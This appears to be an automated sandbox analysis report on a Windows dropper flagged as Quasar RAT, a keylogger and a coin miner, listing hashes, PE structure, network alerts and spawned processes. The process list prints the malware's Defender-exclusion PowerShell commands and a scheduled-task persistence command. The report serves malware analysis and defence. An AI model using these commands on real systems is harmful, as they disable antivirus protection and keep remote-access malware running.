                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\ProgramData\mxergolzfguk\kaptsegthwf.exe
                                                                  File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):14544
                                                                  Entropy (8bit):6.2660301556221185
                                                                  Encrypted:false
                                                                  SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                                  MD5:0C0195C48B6B8582FA6F6373032118DA
                                                                  SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                                  SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                                  SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 5%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................
                                                                  File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                  Entropy (8bit):7.511675116404577
                                                                  TrID:
                                                                  • Win64 Executable GUI Net Framework (217006/5) 47.53%
                                                                  • Win64 Executable GUI (202006/5) 44.25%
                                                                  • Win64 Executable (generic) Net Framework (21505/4) 4.71%
                                                                  • Win64 Executable (generic) (12005/4) 2.63%
                                                                  • Generic Win/DOS Executable (2004/3) 0.44%
                                                                  File name:5fr5gthkjdg71.exe
                                                                  File size:6'332'216 bytes
                                                                  MD5:13b0dec8a2c9291ec13ca9d0f1a98b33
                                                                  SHA1:762c7072179bce1822999dc30c6252262caf6c00
                                                                  SHA256:210673b54f64ba4504b4ffb778b245261ba47ba659bfe14cd66290bf9c0f64ba
                                                                  SHA512:b8b97a630c6f4eca602c756a5a1c29e1cc3354db29176a5b34cb92fd10b14665bde82d01f97c65fbdec3db343e20f6ec67a9e1d3db9c16c280f2e8962d144346
                                                                  SSDEEP:98304:j3GflC+i0bBHXGgjaQx+OhfzTxzdloaDU5BKtxo5fQIwuhkNUwZ:j3GtCj0bR2Ej1hbTxkfzKYAEkXZ
                                                                  TLSH:62561204B3D42EEDC12A6274D4615A71D2FAB80E2A778BBF0558D2771E23745CE39B23
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$.2.`.\.`.\.`.\..y..h.\..y....\..y..m.\.....b.\...X.r.\..._.j.\...Y.Y.\.i...i.\.i...b.\.i...g.\.`.].C.\...Y.R.\...\.a.\.....a.\
                                                                  Icon Hash:1515d4d4442f2d2d
                                                                  Entrypoint:0x140032e60
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x140000000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                  DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                  Time Stamp:0x65DC537B [Mon Feb 26 09:01:47 2024 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:5
                                                                  OS Version Minor:2
                                                                  File Version Major:5
                                                                  File Version Minor:2
                                                                  Subsystem Version Major:5
                                                                  Subsystem Version Minor:2
                                                                  Import Hash:b1c5b1beabd90d9fdabd1df0779ea832
                                                                  Instruction
                                                                  dec eax
                                                                  sub esp, 28h
                                                                  call 00007FC904B9A6F8h
                                                                  dec eax
                                                                  add esp, 28h
                                                                  jmp 00007FC904B9A08Fh
                                                                  int3
                                                                  int3
                                                                  dec eax
                                                                  mov eax, esp
                                                                  dec eax
                                                                  mov dword ptr [eax+08h], ebx
                                                                  dec eax
                                                                  mov dword ptr [eax+10h], ebp
                                                                  dec eax
                                                                  mov dword ptr [eax+18h], esi
                                                                  dec eax
                                                                  mov dword ptr [eax+20h], edi
                                                                  inc ecx
                                                                  push esi
                                                                  dec eax
                                                                  sub esp, 20h
                                                                  dec ebp
                                                                  mov edx, dword ptr [ecx+38h]
                                                                  dec eax
                                                                  mov esi, edx
                                                                  dec ebp
                                                                  mov esi, eax
                                                                  dec eax
                                                                  mov ebp, ecx
                                                                  dec ecx
                                                                  mov edx, ecx
                                                                  dec eax
                                                                  mov ecx, esi
                                                                  dec ecx
                                                                  mov edi, ecx
                                                                  inc ecx
                                                                  mov ebx, dword ptr [edx]
                                                                  dec eax
                                                                  shl ebx, 04h
                                                                  dec ecx
                                                                  add ebx, edx
                                                                  dec esp
                                                                  lea eax, dword ptr [ebx+04h]
                                                                  call 00007FC904B99513h
                                                                  mov eax, dword ptr [ebp+04h]
                                                                  and al, 66h
                                                                  neg al
                                                                  mov eax, 00000001h
                                                                  sbb edx, edx
                                                                  neg edx
                                                                  add edx, eax
                                                                  test dword ptr [ebx+04h], edx
                                                                  je 00007FC904B9A223h
                                                                  dec esp
                                                                  mov ecx, edi
                                                                  dec ebp
                                                                  mov eax, esi
                                                                  dec eax
                                                                  mov edx, esi
                                                                  dec eax
                                                                  mov ecx, ebp
                                                                  call 00007FC904B9C237h
                                                                  dec eax
                                                                  mov ebx, dword ptr [esp+30h]
                                                                  dec eax
                                                                  mov ebp, dword ptr [esp+38h]
                                                                  dec eax
                                                                  mov esi, dword ptr [esp+40h]
                                                                  dec eax
                                                                  mov edi, dword ptr [esp+48h]
                                                                  dec eax
                                                                  add esp, 20h
                                                                  inc ecx
                                                                  pop esi
                                                                  ret
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  dec eax
                                                                  sub esp, 48h
                                                                  dec eax
                                                                  lea ecx, dword ptr [esp+20h]
                                                                  call 00007FC904B88AA3h
                                                                  dec eax
                                                                  lea edx, dword ptr [000257C7h]
                                                                  dec eax
                                                                  lea ecx, dword ptr [esp+20h]
                                                                  call 00007FC904B9B2F2h
                                                                  int3
                                                                  jmp 00007FC904BA14D4h
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  Programming Language:
                                                                  • [ C ] VS2008 SP1 build 30729
                                                                  • [IMP] VS2008 SP1 build 30729
                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x597a00x34.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x597d40x50.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x700000xe360.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x6a0000x306c.pdata
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x7f0000x970.reloc
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x536c00x54.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x537800x28.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x4b3f00x140.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x480000x508.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x588bc0x120.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  .text0x10000x466ee0x4680027edb25a1bc32573014bf3adb5cecc24False0.536860039893617data6.469383562827248IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                  .rdata0x480000x128c40x12a00cde5f7a0fae18bcdb38da9f29d7f3313False0.449834836409396data5.269838116965451IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .data0x5b0000xe75c0x1a000a420650d3abfc14c296cd4945b33a1dFalse0.28260216346153844data3.2569573130951395IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .pdata0x6a0000x306c0x320095c27b680fbce994429e951f39e7a9adFalse0.487734375data5.502914123440489IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .didat0x6e0000x3600x40053c09865fd6da5cc74254921d9575e3dFalse0.259765625data3.025278137091312IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  _RDATA0x6f0000x15c0x20058d3584c9c50f7594166c2ade479252fFalse0.40234375data3.307334517307356IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .rsrc0x700000xe3600xe4002ce7b064b562668bb9f9675200fd1906False0.6302425986842105data6.596823435141548IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .reloc0x7f0000x9700xa0077a9ddfc47a5650d6eebbcc823e39532False0.52421875data5.336289720085303IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                  PNG0x706800xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
                                                                  PNG0x711c80x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
                                                                  RT_ICON0x727780x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.47832369942196534
                                                                  RT_ICON0x72ce00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.5410649819494585
                                                                  RT_ICON0x735880xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.4933368869936034
                                                                  RT_ICON0x744300x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/mEnglishUnited States0.5390070921985816
                                                                  RT_ICON0x748980x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/mEnglishUnited States0.41393058161350843
                                                                  RT_ICON0x759400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/mEnglishUnited States0.3479253112033195
                                                                  RT_ICON0x77ee80x3d71PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9809269502193401
                                                                  RT_DIALOG0x7c5b80x286dataEnglishUnited States0.5092879256965944
                                                                  RT_DIALOG0x7c3880x13adataEnglishUnited States0.60828025477707
                                                                  RT_DIALOG0x7c4c80xecdataEnglishUnited States0.6991525423728814
                                                                  RT_DIALOG0x7c2580x12edataEnglishUnited States0.5927152317880795
                                                                  RT_DIALOG0x7bf200x338dataEnglishUnited States0.45145631067961167
                                                                  RT_DIALOG0x7bcc80x252dataEnglishUnited States0.5757575757575758
                                                                  RT_STRING0x7cf980x1e2dataEnglishUnited States0.3900414937759336
                                                                  RT_STRING0x7d1800x1ccdataEnglishUnited States0.4282608695652174
                                                                  RT_STRING0x7d3500x1b8dataEnglishUnited States0.45681818181818185
                                                                  RT_STRING0x7d5080x146dataEnglishUnited States0.5153374233128835
                                                                  RT_STRING0x7d6500x46cdataEnglishUnited States0.3454063604240283
                                                                  RT_STRING0x7dac00x166dataEnglishUnited States0.49162011173184356
                                                                  RT_STRING0x7dc280x152dataEnglishUnited States0.5059171597633136
                                                                  RT_STRING0x7dd800x10adataEnglishUnited States0.49624060150375937
                                                                  RT_STRING0x7de900xbcdataEnglishUnited States0.6329787234042553
                                                                  RT_STRING0x7df500x1c0dataEnglishUnited States0.5178571428571429
                                                                  RT_STRING0x7e1100x250dataEnglishUnited States0.44256756756756754
                                                                  RT_GROUP_ICON0x7bc600x68dataEnglishUnited States0.7019230769230769
                                                                  RT_MANIFEST0x7c8400x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.39786666666666665
                                                                  DLLImport
                                                                  KERNEL32.dllLocalFree, GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, GetCurrentProcessId, CreateDirectoryW, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetModuleFileNameW, SetCurrentDirectoryW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, ExpandEnvironmentStringsW, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, GlobalMemoryStatusEx, LoadResource, SizeofResource, GetTimeFormatW, GetDateFormatW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, IsValidCodePage, FindNextFileA, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, InitializeCriticalSectionAndSpinCount, WaitForSingleObjectEx, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlPcToFileHeader, RtlUnwindEx, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, GetStringTypeW, HeapReAlloc, LCMapStringW, FindFirstFileExA
                                                                  OLEAUT32.dllSysAllocString, SysFreeString, VariantClear
                                                                  gdiplus.dllGdipCloneImage, GdipFree, GdipDisposeImage, GdipCreateBitmapFromStream, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipAlloc
                                                                  Language of compilation systemCountry where language is spokenMap
                                                                  EnglishUnited States
                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                  2025-01-02T09:58:00.964292+01002017871ET COINMINER W32/BitCoinMiner.MultiThreat Subscribe/Authorize Stratum Protocol Message2192.168.2.44973831.220.102.193333TCP
                                                                  2025-01-02T09:58:34.299221+01002017871ET COINMINER W32/BitCoinMiner.MultiThreat Subscribe/Authorize Stratum Protocol Message2192.168.2.44973831.220.102.193333TCP
                                                                  2025-01-02T09:58:34.299494+01002017871ET COINMINER W32/BitCoinMiner.MultiThreat Subscribe/Authorize Stratum Protocol Message2192.168.2.44973831.220.102.193333TCP
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Jan 2, 2025 09:58:06.076306105 CET497304000192.168.2.4185.148.3.216
                                                                  Jan 2, 2025 09:58:06.081125021 CET400049730185.148.3.216192.168.2.4
                                                                  Jan 2, 2025 09:58:06.081216097 CET497304000192.168.2.4185.148.3.216
                                                                  Jan 2, 2025 09:58:06.095686913 CET497304000192.168.2.4185.148.3.216
                                                                  Jan 2, 2025 09:58:06.100508928 CET400049730185.148.3.216192.168.2.4
                                                                  Jan 2, 2025 09:58:07.767581940 CET400049730185.148.3.216192.168.2.4
                                                                  Jan 2, 2025 09:58:07.767764091 CET497304000192.168.2.4185.148.3.216
                                                                  Jan 2, 2025 09:58:07.780662060 CET497304000192.168.2.4185.148.3.216
                                                                  Jan 2, 2025 09:58:07.785422087 CET400049730185.148.3.216192.168.2.4
                                                                  Jan 2, 2025 09:58:11.282919884 CET497314000192.168.2.4185.148.3.216
                                                                  Jan 2, 2025 09:58:11.287765980 CET400049731185.148.3.216192.168.2.4
                                                                  Jan 2, 2025 09:58:11.289438009 CET497314000192.168.2.4185.148.3.216
                                                                  Jan 2, 2025 09:58:11.289845943 CET497314000192.168.2.4185.148.3.216
                                                                  Jan 2, 2025 09:58:11.294699907 CET400049731185.148.3.216192.168.2.4
                                                                  Jan 2, 2025 09:58:12.971055984 CET400049731185.148.3.216192.168.2.4
                                                                  Jan 2, 2025 09:58:12.971226931 CET497314000192.168.2.4185.148.3.216
                                                                  Jan 2, 2025 09:58:12.971546888 CET497314000192.168.2.4185.148.3.216
                                                                  Jan 2, 2025 09:58:12.976315975 CET400049731185.148.3.216192.168.2.4
                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Jan 2, 2025 09:58:15.951625109 CET1.1.1.1192.168.2.40xab53No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                  Jan 2, 2025 09:58:15.951625109 CET1.1.1.1192.168.2.40xab53No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false

                                                                  Click to jump to process

                                                                  Click to jump to process

                                                                  Click to dive into process behavior distribution

                                                                  Click to jump to process

                                                                  Target ID:0
                                                                  Start time:03:57:58
                                                                  Start date:02/01/2025
                                                                  Path:C:\Users\user\Desktop\5fr5gthkjdg71.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Users\user\Desktop\5fr5gthkjdg71.exe"
                                                                  Imagebase:0x7ff731c70000
                                                                  File size:6'332'216 bytes
                                                                  MD5 hash:13B0DEC8A2C9291EC13CA9D0F1A98B33
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000000.00000003.1687810201.00000209BA177000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:1
                                                                  Start time:03:57:59
                                                                  Start date:02/01/2025
                                                                  Path:C:\Users\user\Desktop\gfiKDLgr58thy4d.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Users\user\Desktop\gfiKDLgr58thy4d.exe"
                                                                  Imagebase:0x7ff6880c0000
                                                                  File size:2'874'368 bytes
                                                                  MD5 hash:952F360A4651F948BE3A673178631641
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Antivirus matches:
                                                                  • Detection: 92%, ReversingLabs
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:2
                                                                  Start time:03:57:59
                                                                  Start date:02/01/2025
                                                                  Path:C:\Users\user\Desktop\GR55Qg1hth.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Users\user\Desktop\GR55Qg1hth.exe"
                                                                  Imagebase:0x7ff650220000
                                                                  File size:2'479'616 bytes
                                                                  MD5 hash:8E40252356A6FB3F8F52D1EFFA2C2C3C
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Antivirus matches:
                                                                  • Detection: 100%, Avira
                                                                  • Detection: 100%, Joe Sandbox ML
                                                                  • Detection: 96%, ReversingLabs
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:3
                                                                  Start time:03:57:59
                                                                  Start date:02/01/2025
                                                                  Path:C:\Users\user\Desktop\F4R5fd8grr.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Users\user\Desktop\F4R5fd8grr.exe"
                                                                  Imagebase:0xe70000
                                                                  File size:514'048 bytes
                                                                  MD5 hash:EA001F076677C9B0DD774AE670EFDF63
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000003.00000000.1691589701.0000000000EF0000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000003.00000000.1690944471.0000000000E72000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: C:\Users\user\Desktop\F4R5fd8grr.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\Desktop\F4R5fd8grr.exe, Author: Joe Security
                                                                  • Rule: MAL_QuasarRAT_May19_1, Description: Detects QuasarRAT malware, Source: C:\Users\user\Desktop\F4R5fd8grr.exe, Author: Florian Roth
                                                                  • Rule: Vermin_Keylogger_Jan18_1, Description: Detects Vermin Keylogger, Source: C:\Users\user\Desktop\F4R5fd8grr.exe, Author: Florian Roth
                                                                  • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: C:\Users\user\Desktop\F4R5fd8grr.exe, Author: ditekSHen
                                                                  • Rule: MALWARE_Win_QuasarStealer, Description: Detects Quasar infostealer, Source: C:\Users\user\Desktop\F4R5fd8grr.exe, Author: ditekshen
                                                                  Antivirus matches:
                                                                  • Detection: 100%, Avira
                                                                  • Detection: 100%, Joe Sandbox ML
                                                                  • Detection: 96%, ReversingLabs
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:4
                                                                  Start time:03:57:59
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                  Imagebase:0x7ff788560000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:5
                                                                  Start time:03:57:59
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:6
                                                                  Start time:03:57:59
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                                  Imagebase:0x7ff788560000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:7
                                                                  Start time:03:57:59
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:8
                                                                  Start time:03:58:02
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"schtasks" /create /tn "3dfx Startup" /sc ONLOGON /tr "C:\Users\user\Desktop\F4R5fd8grr.exe" /rl HIGHEST /f
                                                                  Imagebase:0x7ff76f990000
                                                                  File size:235'008 bytes
                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:9
                                                                  Start time:03:58:02
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:10
                                                                  Start time:03:58:02
                                                                  Start date:02/01/2025
                                                                  Path:C:\Users\user\AppData\Roaming\SubDir\Client.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Users\user\AppData\Roaming\SubDir\Client.exe"
                                                                  Imagebase:0x420000
                                                                  File size:514'048 bytes
                                                                  MD5 hash:EA001F076677C9B0DD774AE670EFDF63
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe, Author: Joe Security
                                                                  • Rule: MAL_QuasarRAT_May19_1, Description: Detects QuasarRAT malware, Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe, Author: Florian Roth
                                                                  • Rule: Vermin_Keylogger_Jan18_1, Description: Detects Vermin Keylogger, Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe, Author: Florian Roth
                                                                  • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe, Author: ditekSHen
                                                                  • Rule: MALWARE_Win_QuasarStealer, Description: Detects Quasar infostealer, Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe, Author: ditekshen
                                                                  Antivirus matches:
                                                                  • Detection: 100%, Avira
                                                                  • Detection: 100%, Joe Sandbox ML
                                                                  • Detection: 96%, ReversingLabs
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:11
                                                                  Start time:03:58:04
                                                                  Start date:02/01/2025
                                                                  Path:C:\Users\user\Desktop\F4R5fd8grr.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Users\user\Desktop\F4R5fd8grr.exe
                                                                  Imagebase:0x510000
                                                                  File size:514'048 bytes
                                                                  MD5 hash:EA001F076677C9B0DD774AE670EFDF63
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:12
                                                                  Start time:03:58:04
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\schtasks.exe
